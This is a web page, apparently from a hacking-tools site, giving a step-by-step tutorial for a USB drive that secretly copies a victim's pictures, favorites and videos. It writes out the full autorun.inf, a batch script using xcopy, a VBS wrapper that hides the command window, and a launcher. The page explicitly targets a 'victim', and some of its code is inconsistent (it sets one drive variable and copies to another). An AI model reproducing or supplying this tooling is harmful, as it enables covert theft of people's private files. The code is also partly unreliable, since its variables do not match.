🔥 Burn Fat Fast. Discover How! 💪

How to make a data stealing flash drive 1. open notepad and w | Hacker's Tools Store

How to make a data stealing flash drive

1. open notepad and write down the following code

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

And Save this as file as autorun.inf

2. Open Notepad again and copy-paste the following lines

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures"
"%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites"
"%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos"
"%drive%\all\vids"
@echo off
cls

And Save this file as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

3. Open Notepad once again and copy-paste the following line.
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
& Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

4. Open Notepad one last time and copy-paste the following line.
wscript.exe \invisible.vbs file.bat
& save this as launch.bat

5. Copy all 4 files created in the above steps and put it on the root of the Flash drive Also create a folder
named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

6. This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

@hackers_tools_store